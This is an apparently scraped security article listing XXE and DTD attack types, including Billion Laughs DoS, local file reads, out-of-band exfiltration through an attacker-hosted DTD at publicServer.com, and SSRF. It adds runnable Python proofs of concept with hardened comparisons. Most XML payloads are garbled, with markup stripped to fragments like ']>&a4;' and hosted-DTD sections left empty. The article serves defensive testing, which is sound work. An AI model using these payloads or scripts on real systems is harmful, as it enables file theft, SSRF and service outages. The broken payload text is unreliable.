Analysis of Different Types of DTD/XXE attacks
When evaluating the security of XML-based services, you cannot ignore DTD-based attacks such as XML External Entity injection (XXE).
In this article we provide a comprehensive list of attacks that abuse the different DTD mechanisms (internal and external entities, parameter entities, external subsets).
Attacks are classified as follows:
Denial of Service attacks (DoS)
Basic XXE attacks
Advanced XXE attacks
Server-Side Request Forgery (SSRF)
XML inclusion mechanism (XInclude)
Extensible Stylesheet Language Transformations (XSLT)
Denial of Service (DoS): test whether the parser expands entities at all:
]>&a2;
If parsing becomes noticeably slow, the test has succeeded: the parser expands entities, so its configuration may be vulnerable to at least one of the DoS attacks below.
Billion Laughs attack (Klein, 2002)
Note: the Billion Laughs attack uses nested entity definitions, each of which references the previous one many times, so that a single reference in the document expands to a billion "Ha!" strings in memory. The aim is to exhaust available memory, because many XML parsers keep the entire expanded document in memory while parsing.
]>&a4;
The expanded document is only about 30 KB, yet producing it requires the parser to resolve 11,111 entity references (1 + 10 + 100 + 1,000 + 10,000), which exceeds the number of entity references a hardened parser should be willing to resolve.
Billion Laughs attack with parameter entities (Späth, 2015)
]>&g;
File hosted at http://publicServer.com/dos.dtd:
Quadratic Blowup DoS attack (one large entity referenced many times, no nesting required)
&a0;&a0;...&a0;
General entity recursion
Recursive entity references are forbidden by the XML specification [WFC: No Recursion], so a conforming parser must reject this document; the test checks whether the parser enforces that constraint instead of looping.
]>&a;
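The entity-support test, the Billion Laughs and Quadratic Blowup payloads and the recursion check above, as an added example that is not code from the page. It generates the payloads with small parameters (so it finishes instantly), computes how much a parser will have to materialise, runs them through Python's bundled expat, and shows the hardened configuration (refusing any DOCTYPE) beside the vulnerable one. The entity names `a0`..`a4`, the atom `dos` and the fan-out of 10 are assumptions that reproduce the 30 KB / 11,111-reference figures quoted in the text.

```python
"""DoS checks for a DTD-aware XML parser (added example, not code from the
page). Payloads are generated with small, adjustable parameters; the numbers
quoted in the text (30 KB, 11,111 references) fall out of the same formula.
Python's bundled expat is the parser under test; no third-party modules."""
import xml.parsers.expat as expat


def build_billion_laughs(depth=4, fanout=10, atom="dos"):
    """Nested general entities: a1 = fanout copies of a0, a2 = fanout copies
    of a1, ... The document references only the outermost entity."""
    decls = [f'<!ENTITY a0 "{atom}">']
    for level in range(1, depth + 1):
        refs = f"&a{level - 1};" * fanout
        decls.append(f'<!ENTITY a{level} "{refs}">')
    return f"<!DOCTYPE data [{''.join(decls)}]><data>&a{depth};</data>"


def expansion_stats(depth=4, fanout=10, atom_len=3):
    """Return (entity references the parser must resolve, expanded bytes).
    With the defaults: 1 + 10 + 100 + 1,000 + 10,000 = 11,111 references
    producing 10**4 * 3 = 30,000 bytes (30 KB), the figures in the text."""
    references = sum(fanout ** level for level in range(depth + 1))
    return references, fanout ** depth * atom_len


def build_quadratic_blowup(atom_len=1000, refs=100):
    """Quadratic blowup: one large entity referenced many times. No nesting
    is needed, so it also hits parsers that only limit nesting depth."""
    return (f'<!DOCTYPE data [<!ENTITY a0 "{"d" * atom_len}">]>'
            f"<data>{'&a0;' * refs}</data>")


# Forbidden by [WFC: No Recursion]; a conforming parser must reject it.
RECURSIVE_ENTITY = '<!DOCTYPE data [<!ENTITY a "&a;">]><data>&a;</data>'


def expand_with_expat(doc):
    """Entity-support test: parse normally and return the expanded text.
    A parser that returns 30,000 bytes for a document under 300 bytes
    expands entities and is worth probing for DoS."""
    parser = expat.ParserCreate()
    chunks = []
    parser.CharacterDataHandler = chunks.append
    parser.Parse(doc, True)
    return "".join(chunks)


def parser_rejects(doc):
    """True if expat refuses the document (e.g. recursive entities)."""
    try:
        expand_with_expat(doc)
    except expat.ExpatError:
        return True
    return False


def hardened_rejects(doc):
    """Hardened configuration: abort on the first DOCTYPE, so no entity is
    ever declared, let alone expanded. True if the document was refused."""
    parser = expat.ParserCreate()

    def refuse_doctype(*_args):
        raise ValueError("DOCTYPE is not accepted by this service")

    parser.StartDoctypeDeclHandler = refuse_doctype
    try:
        parser.Parse(doc, True)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("expected (references, bytes):", expansion_stats())
    print("billion laughs expanded to:", len(expand_with_expat(build_billion_laughs())))
    print("quadratic blowup expanded to:", len(expand_with_expat(build_quadratic_blowup())))
    print("recursion rejected:", parser_rejects(RECURSIVE_ENTITY))
    print("hardened parser rejects payload:", hardened_rejects(build_billion_laughs()))
```

Keep the parameters small when probing a real service: the point of the test is to confirm that entities are expanded (30 KB from a few hundred bytes), not to take the target down. Note that recent expat releases additionally cap the amplification factor once the input exceeds a few megabytes, so a parser that accepts these small payloads may still refuse the full-size attack.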
External entity (Steuck, 2002)
This attack declares an external entity that references a very large resource (for example C:/pagefile.sys or /dev/random), either remote or local.
It only succeeds, however, if the parser is prepared to read the huge resource in full instead of refusing it.
]>&dos;
Basic XXE attacks (Steuck, 2002)
]>&file;
The file '/sys/power/image_size' is used as the example because it is very short (a single line) and contains no characters that are special in XML.
This type of attack requires a direct feedback channel (the parsed content must be returned to the attacker), and the files that can be read are limited by characters that are forbidden in XML content, such as "<" and "&".
If such characters appear in the target file (for example /etc/fstab, whose comment header on Debian-derived systems contains "<file system>"), the XML parser raises an error and stops parsing.
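The basic XXE above and its two limits (a direct feedback channel is needed, and a "<" in the file breaks the parse), as an added example that is not code from the page. It targets Python's xml.sax (expat) with the external-entity feature switched on, which is the vulnerable configuration, and then with it off, today's default. The two target files are constructed stand-ins for /sys/power/image_size and /etc/fstab, written to a temporary directory so the demo runs anywhere.

```python
"""Basic XXE against Python's xml.sax (expat), added here as an example; it is
not code from the page. Two look-alike files are constructed in a temporary
directory instead of reading /sys/power/image_size and /etc/fstab; the
payload is otherwise the one described above."""
import io
import pathlib
import tempfile
import xml.sax
import xml.sax.handler as handler


class TextCollector(xml.sax.ContentHandler):
    """Gathers the character data the parser returns: the feedback channel."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, data):
        self.chunks.append(data)


def xxe_payload(target_uri):
    """One external general entity; the file contents replace &file;."""
    return (f'<!DOCTYPE data [<!ENTITY file SYSTEM "{target_uri}">]>'
            "<data>&file;</data>")


def parse_collect(doc, resolve_external):
    """resolve_external=True reproduces the vulnerable configuration (the
    default in older Python releases); False is today's default and the fix."""
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, resolve_external)
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(doc.encode()))
    return "".join(collector.chunks)


def xxe_read(path, resolve_external=True):
    """('ok', text) when the file came back, ('error', message) otherwise."""
    try:
        return "ok", parse_collect(xxe_payload(path.as_uri()), resolve_external)
    except xml.sax.SAXParseException as exc:
        return "error", exc.getMessage()


def run_demo():
    with tempfile.TemporaryDirectory() as tmp:
        # Constructed stand-ins: a one-line number like /sys/power/image_size,
        # and a file whose comment header contains '<' like Debian's /etc/fstab.
        image_size = pathlib.Path(tmp, "image_size")
        image_size.write_text("1318686720\n")
        fstab = pathlib.Path(tmp, "fstab")
        fstab.write_text("# <file system> <mount point> <type> <options>\n"
                         "/dev/sda1 / ext4 defaults 0 1\n")
        return {
            "image_size_vulnerable": xxe_read(image_size, True),
            "fstab_vulnerable": xxe_read(fstab, True),
            "image_size_hardened": xxe_read(image_size, False),
        }


if __name__ == "__main__":
    for name, outcome in run_demo().items():
        print(f"{name}: {outcome}")
```

The vulnerable run returns the single-line file verbatim, the fstab stand-in fails with a well-formedness error because the external entity is parsed as XML text, and the hardened run returns an empty element because the external entity is simply skipped.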
XXE attack using the netdoc: scheme (Java's URL handler)
]>&file;
Source: @NirGoldshlager
Advanced XXE attacks: direct feedback channel
These advanced XXE attacks bypass the restrictions of the basic XXE attack; where no direct feedback channel exists, they fall back on out-of-band (OOB) channels (next section).
Bypassing the restrictions of basic XXE attacks (Morgan, 2014): the externally hosted DTD wraps the file contents in a CDATA section, so characters such as "<" and "&" no longer break parsing.
%dtd;]>&all;
File hosted at http://publicServer.com/parameterEntity_core.dtd:
XXE attack abusing attribute values
%remote;]>
File hosted at http://publicServer.com/external_entity_attribute.dtd:
%param1;
Advanced XXE attacks: out-of-band (OOB) channel
The absence of a direct feedback channel does not mean there is no XXE attack: the data can be sent to an attacker-controlled server instead.
XXE OOB attack (Yunusov, 2013)
&send;
File hosted at http://publicServer.com/parameterEntity_oob.dtd:
%all;
XXE OOB attack with parameter entities (Yunusov, 2013)
The difference from the previous variant is that only parameter entities are used.
%remote;%send;]>4
File hosted at http://publicServer.com/parameterEntity_sendhttp.dtd:
%param1;
XXE OOB attack with parameter entities over FTP (Novikov, 2014)
Using FTP instead of HTTP as the exfiltration channel lets the attacker read files of arbitrary length, because the line breaks in the exfiltrated data, which abort an HTTP request, are tolerated by the FTP exchange.
%remote;%send;]>4
File hosted at http://publicServer.com/parameterEntity_sendftp.dtd:
%param1;
For this attack you need to set up a rogue FTP server that accepts any command sequence. With minor adjustments, the PoC can be used against any parser.
SchemaEntity attack (Späth, 2015)
There are three variants: (i) schemaLocation, (ii) noNamespaceSchemaLocation and (iii) XInclude.
schemaLocation
%remote; ]>
4
noNamespaceSchemaLocation
%remote; ]>
XInclude
%remote; ]>
File hosted at http://publicServer.com/external_entity_attribute.dtd:
%param1;
SSRF attack via the DOCTYPE (the parser fetches the external DTD)
]>4
External entity (Steuck, 2002)
]>&remote;
Referencing a well-formed XML file (or any plain text file) avoids parser errors, but some resolvers issue the request even when the referenced URL is not correctly formed, so the SSRF succeeds even though parsing then fails.
External parameter entity (Yunusov, 2013)
%remote; ]>4
File hosted at http://publicServer.com/url_invocation_parameterEntity.dtd:
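The DOCTYPE and external-entity SSRF above, as an added example that is not code from the page. A throw-away HTTP listener on 127.0.0.1 stands in for publicServer.com and records every request it receives, which is what an attacker watches on a real listener; Python's xml.sax (expat) is the parser under test. The two served paths, /url_invocation.dtd and /file.txt, and their bodies are constructed for this demo.

```python
"""SSRF through the DOCTYPE and through an external general entity, added
as an example (not code from the page). A throw-away HTTP listener on
127.0.0.1 stands in for publicServer.com and records every request."""
import io
import threading
import urllib.request
import xml.sax
import xml.sax.handler as handler
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed responses: an external DTD declaring one entity, and a text file.
RESPONSES = {
    "/url_invocation.dtd": b'<!ENTITY remote "it_works">',
    "/file.txt": b"it_works",
}


class Listener(BaseHTTPRequestHandler):
    seen = []  # request paths in arrival order, shared by all instances

    def do_GET(self):
        Listener.seen.append(self.path)
        body = RESPONSES.get(self.path, b"")
        self.send_response(200 if body else 404)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *_args):  # silence the default stderr log
        pass


class TextCollector(xml.sax.ContentHandler):
    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, data):
        self.chunks.append(data)


def parse_collect(doc, fetch_external):
    """fetch_external=True is the vulnerable configuration; False (today's
    default) is the hardened one. Parse errors are returned, not raised."""
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, fetch_external)
    collector = TextCollector()
    parser.setContentHandler(collector)
    try:
        parser.parse(io.BytesIO(doc.encode()))
    except xml.sax.SAXParseException as exc:
        return f"<parse error: {exc.getMessage()}>"
    return "".join(collector.chunks)


def doctype_payload(base):
    """SSRF via DOCTYPE: the external subset itself is fetched."""
    return (f'<!DOCTYPE data SYSTEM "{base}/url_invocation.dtd">'
            "<data>&remote;</data>")


def entity_payload(base):
    """SSRF via an external general entity (Steuck, 2002)."""
    return (f'<!DOCTYPE data [<!ENTITY remote SYSTEM "{base}/file.txt">]>'
            "<data>&remote;</data>")


def run_demo():
    # Ignore any http_proxy setting so the requests really reach the listener.
    urllib.request.install_opener(
        urllib.request.build_opener(urllib.request.ProxyHandler({})))
    server = HTTPServer(("127.0.0.1", 0), Listener)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    base = f"http://127.0.0.1:{server.server_port}"
    Listener.seen.clear()
    try:
        result = {
            "doctype": parse_collect(doctype_payload(base), True),
            "entity": parse_collect(entity_payload(base), True),
            "vulnerable_requests": list(Listener.seen),
        }
        Listener.seen.clear()
        result["hardened"] = parse_collect(doctype_payload(base), False)
        result["hardened_requests"] = list(Listener.seen)
    finally:
        server.shutdown()
        server.server_close()
    return result


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

With external entities enabled the listener logs one request per payload and both documents expand to it_works; with them disabled no request is made at all, which is the observable difference a blue team should look for (outbound HTTP from an XML parser to a host it has no business talking to).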
XInclude
File hosted at http://publicServer.com/file.xml:
it_works
schemaLocation
4
File hosted at http://publicServer.com/url_invocation_schemaLocation.xsd:
Or use this file.
noNamespaceSchemaLocation
4
File hosted at http://publicServer.com/url_invocation_noNamespaceSchemaLocation.xsd:
XInclude attack (Morgan, 2014)
XSLT attacks